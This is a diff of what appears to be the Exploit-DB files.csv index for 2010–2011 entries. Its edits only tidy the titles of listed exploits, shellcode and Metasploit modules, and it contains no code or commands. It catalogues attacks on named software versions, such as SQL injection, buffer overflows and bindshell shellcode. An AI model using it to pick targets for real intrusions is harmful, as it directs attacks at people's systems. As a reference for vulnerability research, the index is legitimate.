15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - (fckeditor) Arbitrary File Upload",2010-10-18,"Kubanezi AHG",php,webapps,0 15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection",2010-10-18,X_AviaTique_X,php,webapps,0 15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - Cross-Site Request Forgery",2010-10-19,KnocKout,php,webapps,0 -15283,platforms/windows/dos/15283.txt,"Hanso Converter 1.4.0 - '.ogg'Denial of Service",2010-10-19,anT!-Tr0J4n,windows,dos,0 +15283,platforms/windows/dos/15283.txt,"Hanso Converter 1.4.0 - '.ogg' Denial of Service",2010-10-19,anT!-Tr0J4n,windows,dos,0 15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow",2010-10-19,Mighty-D,windows,local,0 15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0 15302,platforms/windows/dos/15302.py,"Spider Player 2.4.5 - Denial of Service",2010-10-22,"MOHAMED ABDI",windows,dos,0 @@ -13325,10 +13327,10 @@ id,file,description,date,author,platform,type,port 15310,platforms/php/webapps/15310.py,"Jamb - Cross-Site Request Forgery Arbitrary Add a Post",2010-10-25,Stoke,php,webapps,0 15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Stack Overflow",2010-10-25,"Mighty-D and 7eK",windows,local,0 15313,platforms/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor - Multiple Vulnerabilities",2010-10-25,"David Hoyt",php,webapps,0 -15314,platforms/arm/shellcode/15314.asm,"ARM - Bindshell port 0x1337 shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 -15315,platforms/arm/shellcode/15315.asm,"ARM - Bind Connect UDP Port 68 shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 -15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 -15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 +15314,platforms/arm/shellcode/15314.asm,"ARM - Bindshell port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 +15315,platforms/arm/shellcode/15315.asm,"ARM - Bind Connect UDP Port 68 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 +15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 +15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0 15319,platforms/windows/dos/15319.pl,"Apache 2.2 - (Windows) Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0 15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)",2010-10-26,Sweet,php,webapps,0 @@ -13369,7 +13371,7 @@ id,file,description,date,author,platform,type,port 15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,php,webapps,0 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0 15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0 -15358,platforms/windows/remote/15358.txt,"SmallFTPD 1.0.3 - Remote Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 +15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Remote Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0 15361,platforms/php/webapps/15361.pl,"MetInfo 3.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0 15366,platforms/php/webapps/15366.txt,"Joomla Flip Wall Component (com_flipwall) - SQL Injection",2010-10-31,FL0RiX,php,webapps,0 @@ -13408,7 +13410,7 @@ id,file,description,date,author,platform,type,port 15408,platforms/windows/dos/15408.html,"Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service",2010-11-03,"Matthew Bergin",windows,dos,0 15409,platforms/php/webapps/15409.txt,"Zen Cart 1.3.9h - Local File Inclusion",2010-11-03,"Salvatore Fresta",php,webapps,0 15412,platforms/php/webapps/15412.txt,"eocms 0.9.04 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 -15411,platforms/windows/dos/15411.pl,"HtaEdit 3.2.3.0 - '.hta'Buffer Overflow",2010-11-04,anT!-Tr0J4n,windows,dos,0 +15411,platforms/windows/dos/15411.pl,"HtaEdit 3.2.3.0 - '.hta' Buffer Overflow",2010-11-04,anT!-Tr0J4n,windows,dos,0 15413,platforms/php/webapps/15413.txt,"sweetrice CMS 0.6.7 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 15414,platforms/php/webapps/15414.txt,"jaf CMS 4.0 rc2 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0 15415,platforms/php/webapps/15415.txt,"MiniBB 2.5 - SQL Injection",2010-11-04,"High-Tech Bridge SA",php,webapps,0 @@ -13439,7 +13441,7 @@ id,file,description,date,author,platform,type,port 15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal",2010-11-06,chr1x,windows,remote,0 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion",2010-11-06,ViRuS_HiMa,php,webapps,0 15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 -15449,platforms/linux/remote/15449.pl,"ProFTPD IAC 1.3.x - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0 +15449,platforms/linux/remote/15449.pl,"ProFTPd IAC 1.3.x - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0 15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21 15451,platforms/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure",2010-11-07,SYSTEM_OVERIDE,php,webapps,0 @@ -13447,8 +13449,8 @@ id,file,description,date,author,platform,type,port 15454,platforms/php/webapps/15454.txt,"Joomla Component (com_clan) - SQL Injection",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 & 4 - (fckeditor) Arbitrary File Upload",2010-11-08,Net.Edit0r,php,webapps,0 15456,platforms/php/webapps/15456.txt,"Joomla Component (com_clanlist) - SQL Injection",2010-11-08,CoBRa_21,php,webapps,0 -15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - '.vbs'Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos,0 -15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - '.cda'Denial of Service",2010-11-12,anT!-Tr0J4n,windows,dos,0 +15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - '.vbs' Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos,0 +15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - '.cda' Denial of Service",2010-11-12,anT!-Tr0J4n,windows,dos,0 15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0 15458,platforms/windows/dos/15458.txt,"PCSX2 0.9.7 Beta - Binary Denial of Service",2010-11-08,41.w4r10r,windows,dos,0 15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0 @@ -13522,7 +13524,7 @@ id,file,description,date,author,platform,type,port 15559,platforms/php/webapps/15559.txt,"IceBB 1.0-rc10 - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0 15560,platforms/php/webapps/15560.txt,"CLANSPHERE 2010.0 Final - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0 15561,platforms/php/webapps/15561.txt,"CompactCMS 1.4.1 - SQL Injection",2010-11-16,"High-Tech Bridge SA",php,webapps,0 -15563,platforms/asp/webapps/15563.txt,"Sitefinity CMS - 'ASP.NET'Arbitrary File Upload",2010-11-17,Net.Edit0r,asp,webapps,0 +15563,platforms/asp/webapps/15563.txt,"Sitefinity CMS - 'ASP.NET' Arbitrary File Upload",2010-11-17,Net.Edit0r,asp,webapps,0 15564,platforms/php/webapps/15564.txt,"Front Accounting 2.3RC2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2010-11-17,"Juan Manuel Garcia",php,webapps,0 15565,platforms/php/webapps/15565.txt,"Front Accounting 2.3RC2 - Multiple SQL Injections",2010-11-17,"Juan Manuel Garcia",php,webapps,0 15566,platforms/windows/local/15566.rb,"DIZzy 1.12 - Local Stack Overflow",2010-11-18,g30rg3_x,windows,local,0 @@ -13537,7 +13539,7 @@ id,file,description,date,author,platform,type,port 15575,platforms/windows/local/15575.py,"Minishare 1.5.5 - Buffer Overflow (users.txt) (Egghunter)",2010-11-19,0v3r,windows,local,0 15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 - Cross-Site Request Forgery Change Admin Password",2010-11-19,Or4nG.M4N,php,webapps,0 15578,platforms/php/webapps/15578.txt,"DVD Rental Software - SQL Injection",2010-11-19,JaMbA,php,webapps,0 -15580,platforms/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 - Stack-based Buffer Overflow",2010-11-20,LiquidWorm,windows,dos,0 +15580,platforms/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 - Stack Based Buffer Overflow",2010-11-20,LiquidWorm,windows,dos,0 15581,platforms/windows/dos/15581.txt,"Native Instruments Reaktor 5 Player 5.5.1 - Heap Memory Corruption",2010-11-20,LiquidWorm,windows,dos,0 15582,platforms/windows/dos/15582.pl,"Native Instruments Kontakt 4 Player - .NKI File Syntactic Analysis Buffer Overflow (PoC)",2010-11-20,LiquidWorm,windows,dos,0 15583,platforms/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 - KSD File Handling Use-After-Free",2010-11-20,LiquidWorm,windows,dos,0 @@ -13597,7 +13599,7 @@ id,file,description,date,author,platform,type,port 15659,platforms/php/webapps/15659.txt,"Contenido CMS 4.8.12 - Cross-Site Scripting",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15660,platforms/php/webapps/15660.txt,"etomite 1.1 - Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 - (list.asp) Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0 -15662,platforms/linux/remote/15662.txt,"ProFTPD 1.3.3c - Compromised Source Remote Root Trojan",2010-12-02,anonymous,linux,remote,21 +15662,platforms/linux/remote/15662.txt,"ProFTPd 1.3.3c - Compromised Source Remote Root Trojan",2010-12-02,anonymous,linux,remote,21 15663,platforms/windows/local/15663.py,"MediaCoder 0.7.5.4797 - '.m3u' Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0 15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0 15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - 'travelbycountry.asp' SQL Injection",2010-12-03,"Ulrik Persson",asp,webapps,0 @@ -13606,7 +13608,7 @@ id,file,description,date,author,platform,type,port 15669,platforms/windows/dos/15669.py,"Mediamonkey 3.2.4.1304 - (mp3) Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0 15670,platforms/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0 15671,platforms/windows/dos/15671.pl,"WaveMax Sound Editor 4.5.1 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0 -15673,platforms/asp/webapps/15673.txt,"Dejcom Market CMS - 'showbrand.aspx'SQL Injection",2010-12-04,Mormoroth,asp,webapps,0 +15673,platforms/asp/webapps/15673.txt,"Dejcom Market CMS - 'showbrand.aspx' SQL Injection",2010-12-04,Mormoroth,asp,webapps,0 15674,platforms/windows/dos/15674.rb,"TFTPUtil GUI 1.4.5 - Denial of Service (Metasploit)",2010-12-04,"Vuk Ivanovic",windows,dos,0 15675,platforms/hardware/webapps/15675.txt,"Multiple Linksys Router - Cross-Site Request Forgery Vulnerabilities",2010-12-04,"Martin Barbella",hardware,webapps,0 15676,platforms/multiple/dos/15676.txt,"Wireshark - LDSS Dissector Buffer Overflow",2010-12-04,"Nephi Johnson",multiple,dos,0 @@ -13672,7 +13674,7 @@ id,file,description,date,author,platform,type,port 15742,platforms/php/webapps/15742.txt,"BEdita 3.0.1.2550 - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 15743,platforms/php/webapps/15743.txt,"BLOG:CMS 4.2.1e - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 15746,platforms/windows/remote/15746.rb,"Microsoft Internet Explorer 8 - CSS Parser Exploit",2010-12-15,"Nephi Johnson",windows,remote,0 -15747,platforms/windows/local/15747.py,"Aesop GIF Creator 2.1 - '.aep'Buffer Overflow",2010-12-16,xsploitedsec,windows,local,0 +15747,platforms/windows/local/15747.py,"Aesop GIF Creator 2.1 - '.aep' Buffer Overflow",2010-12-16,xsploitedsec,windows,local,0 15748,platforms/php/webapps/15748.txt,"QualDev eCommerce script - SQL Injection",2010-12-16,ErrNick,php,webapps,0 15749,platforms/php/webapps/15749.txt,"Joomla JRadio Component (com_jradio) - Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0 15750,platforms/windows/dos/15750.py,"SolarFTP 2.0 - Multiple Commands Denial of Service",2010-12-16,modpr0be,windows,dos,0 @@ -13723,7 +13725,7 @@ id,file,description,date,author,platform,type,port 15800,platforms/php/webapps/15800.txt,"html-edit CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 15801,platforms/php/webapps/15801.txt,"Joomla Component com_xgallery 1.0 - Local File Inclusion",2010-12-21,KelvinX,php,webapps,0 15802,platforms/windows/remote/15802.txt,"ecava integraxor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote,0 -15805,platforms/hardware/dos/15805.php,"Apple iPhone Safari - 'JS .'Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos,0 +15805,platforms/hardware/dos/15805.php,"Apple iPhone Safari - 'JS .' Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos,0 15804,platforms/php/webapps/15804.txt,"jobappr 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps,0 15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway - Command Injection",2010-12-22,"George D. Gal",linux,remote,0 15807,platforms/cgi/webapps/15807.txt,"Mitel AWC - Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps,0 @@ -13754,7 +13756,7 @@ id,file,description,date,author,platform,type,port 15835,platforms/php/webapps/15835.html,"pecio CMS 2.0.5 - Cross-Site Request Forgery (Add Admin)",2010-12-27,"P0C T34M",php,webapps,0 15836,platforms/php/webapps/15836.txt,"OpenEMR 3.2.0 - SQL Injection / Cross-Site Scripting",2010-12-27,blake,php,webapps,0 15837,platforms/php/webapps/15837.txt,"Web@all 1.1 - Remote Admin Settings Change",2010-12-27,"Giuseppe D'Inverno",php,webapps,0 -15839,platforms/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor - '.cov'Memory Corruption",2010-12-28,rgod,windows,dos,0 +15839,platforms/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor - '.cov' Memory Corruption",2010-12-28,rgod,windows,dos,0 15840,platforms/php/webapps/15840.txt,"ardeaCore 2.25 - PHP Framework Remote File Inclusion",2010-12-29,n0n0x,php,webapps,0 15842,platforms/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",hardware,remote,0 15843,platforms/php/webapps/15843.txt,"News Script PHP Pro - (fckeditor) File Upload",2010-12-29,Net.Edit0r,php,webapps,0 @@ -13781,7 +13783,7 @@ id,file,description,date,author,platform,type,port 15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - Cross-Site Scripting / Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0 15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary - 'src .php' File Download",2010-12-30,"Yakir Wizman",windows,remote,0 15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0 -15879,platforms/win_x86/shellcode/15879.txt,"Win32 - speaking shellcode",2010-12-31,Skylined,win_x86,shellcode,0 +15879,platforms/win_x86/shellcode/15879.txt,"Win32 - speaking Shellcode",2010-12-31,Skylined,win_x86,shellcode,0 15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0 15886,platforms/php/webapps/15886.txt,"KLINK - SQL Injection",2011-01-01,"Mauro Rossi and Andres Gomez",php,webapps,0 15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0 @@ -13960,7 +13962,7 @@ id,file,description,date,author,platform,type,port 16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 Wordpress Plugin - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16127,platforms/php/webapps/16127.txt,"T-Content Managment System - Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0 16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Persistent Cross-Site Scripting via useragent http header Injection",2011-02-07,"Saif El-Sherei",php,webapps,0 -16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0 +16129,platforms/linux/dos/16129.txt,"ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0 16130,platforms/php/webapps/16130.txt,"MyMarket 1.71 - 'index.php' SQL Injection",2011-02-07,ahmadso,php,webapps,0 16131,platforms/php/webapps/16131.txt,"SWFUpload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 @@ -14004,7 +14006,7 @@ id,file,description,date,author,platform,type,port 16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow (Post-Authenticated)",2011-02-16,chap0,windows,remote,0 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 -16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv'Denial of Service",2011-02-17,b0telh0,windows,dos,0 +16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0 16181,platforms/php/webapps/16181.txt,"Wordpress User Photo Component Plugin - Remote File Upload",2011-02-17,ADVtools,php,webapps,0 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() NULL Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0 16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file - (avcenter.exe) Local Crash (PoC)",2011-02-19,KedAns-Dz,windows,dos,0 @@ -14063,7 +14065,7 @@ id,file,description,date,author,platform,type,port 16250,platforms/php/webapps/16250.txt,"jQuery Mega Menu 1.0 Wordpress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 16251,platforms/php/webapps/16251.txt,"OPS Old Post Spinner 2.2.1 Wordpress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 16252,platforms/hardware/webapps/16252.html,"Linksys Cisco WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",hardware,webapps,0 -16255,platforms/windows/dos/16255.pl,"Magic Music Editor - '.cda'Denial of Service",2011-02-28,"AtT4CKxT3rR0r1ST ",windows,dos,0 +16255,platforms/windows/dos/16255.pl,"Magic Music Editor - '.cda' Denial of Service",2011-02-28,"AtT4CKxT3rR0r1ST ",windows,dos,0 16256,platforms/php/webapps/16256.txt,"DO-CMS - Multiple SQL Injections",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 16257,platforms/php/webapps/16257.txt,"SnapProof - 'page.php' SQL Injection",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 16259,platforms/windows/remote/16259.txt,"home ftp server 1.12 - Directory Traversal",2011-02-28,clshack,windows,remote,0 @@ -14112,7 +14114,7 @@ id,file,description,date,author,platform,type,port 16308,platforms/multiple/remote/16308.rb,"Maple Maplet - File Creation / Command Execution",2010-09-20,Metasploit,multiple,remote,0 16309,platforms/multiple/remote/16309.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (1)",2010-09-20,Metasploit,multiple,remote,0 16310,platforms/multiple/remote/16310.rb,"PHP 4 - unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,Metasploit,multiple,remote,0 -16311,platforms/linux/remote/16311.rb,"wu-ftpd - SITE EXEC/INDEX Format String",2010-11-30,Metasploit,linux,remote,0 +16311,platforms/linux/remote/16311.rb,"WU-FTPD - SITE EXEC/INDEX Format String",2010-11-30,Metasploit,linux,remote,0 16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,Metasploit,multiple,remote,0 16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution",2010-11-24,Metasploit,php,webapps,0 16314,platforms/multiple/remote/16314.rb,"Sun Java - System Web Server WebDAV OPTIONS Buffer Overflow",2010-08-07,Metasploit,multiple,remote,0 @@ -14131,7 +14133,7 @@ id,file,description,date,author,platform,type,port 16327,platforms/solaris/remote/16327.rb,"Solaris in.TelnetD - TTYPROMPT Buffer Overflow",2010-06-22,Metasploit,solaris,remote,0 16328,platforms/solaris/remote/16328.rb,"Sun Solaris - Telnet Remote Authentication Bypass",2010-06-22,Metasploit,solaris,remote,0 16329,platforms/solaris/remote/16329.rb,"Samba - lsa_io_trans_names Heap Overflow (Solaris)",2010-04-05,Metasploit,solaris,remote,0 -16330,platforms/solaris_sparc/remote/16330.rb,"Samba - trans2open Overflow (Solaris SPARC)",2010-06-21,Metasploit,solaris_sparc,remote,0 +16330,platforms/solaris_sparc/remote/16330.rb,"Samba (Solaris SPARC) - trans2open Overflow",2010-06-21,Metasploit,solaris_sparc,remote,0 16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Overflow Exploit",2010-06-22,Metasploit,windows,remote,0 16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows - Remote Agent Overflow",2010-07-03,Metasploit,windows,remote,0 16333,platforms/windows/remote/16333.rb,"Windows Media Services - ConnectFunnel Stack Buffer Overflow",2010-04-28,Metasploit,windows,remote,0 @@ -14263,13 +14265,13 @@ id,file,description,date,author,platform,type,port 16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16460,platforms/windows/remote/16460.rb,"SecureCRT 4.0 Beta 2 SSH1 - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16462,platforms/windows/remote/16462.rb,"FreeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16462,platforms/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16464,platforms/windows/remote/16464.rb,"ISS - PAM.dll ICQ Parser Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 - Authentication Packet Overflow",2010-06-15,Metasploit,windows,remote,0 16466,platforms/win_x86/remote/16466.rb,"Arkeia Backup Client Type 77 (Windows/x86) - Overflow",2010-05-09,Metasploit,win_x86,remote,0 16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution",2011-01-08,Metasploit,windows,remote,0 -16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr'Path Overflow",2010-04-30,Metasploit,windows,remote,0 +16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr' Path Overflow",2010-04-30,Metasploit,windows,remote,0 16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow",2010-04-30,Metasploit,windows,remote,0 16470,platforms/windows/remote/16470.rb,"Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow",2010-07-25,Metasploit,windows,remote,0 16471,platforms/windows/remote/16471.rb,"Microsoft IIS - WebDAV Write Access Code Execution",2010-09-20,Metasploit,windows,remote,0 @@ -14445,14 +14447,14 @@ id,file,description,date,author,platform,type,port 16641,platforms/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow",2010-09-25,Metasploit,windows,remote,0 16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow (2)",2010-11-11,Metasploit,windows,local,0 16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote - GROUPNAME Buffer Overflow",2010-11-11,Metasploit,windows,local,0 -16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - '.DWB'Stack Buffer Overflow",2010-04-05,Metasploit,windows,local,0 +16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - '.DWB' Stack Buffer Overflow",2010-04-05,Metasploit,windows,local,0 16645,platforms/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 HT3 - File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 - WkImgSrv.dll WKsPictureInterface() ActiveX Exploit",2010-09-25,Metasploit,windows,remote,0 16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow (SEH) (2)",2010-09-25,Metasploit,windows,local,0 -16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack-based Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow",2010-12-16,Metasploit,windows,local,0 16654,platforms/windows/local/16654.rb,"Orbital Viewer - ORB File Parsing Buffer Overflow",2010-03-09,Metasploit,windows,local,0 @@ -14652,8 +14654,8 @@ id,file,description,date,author,platform,type,port 16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Overflow",2010-09-20,Metasploit,linux,remote,0 16849,platforms/linux/remote/16849.rb,"MySQL yaSSL (Linux) - SSL Hello Message Buffer Overflow",2010-05-09,Metasploit,linux,remote,0 16850,platforms/linux/remote/16850.rb,"MySQL - yaSSL CertDecoder::GetName Buffer Overflow",2010-04-30,Metasploit,linux,remote,0 -16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow",2011-01-09,Metasploit,linux,remote,0 -16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow",2011-01-09,Metasploit,linux,remote,0 +16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC 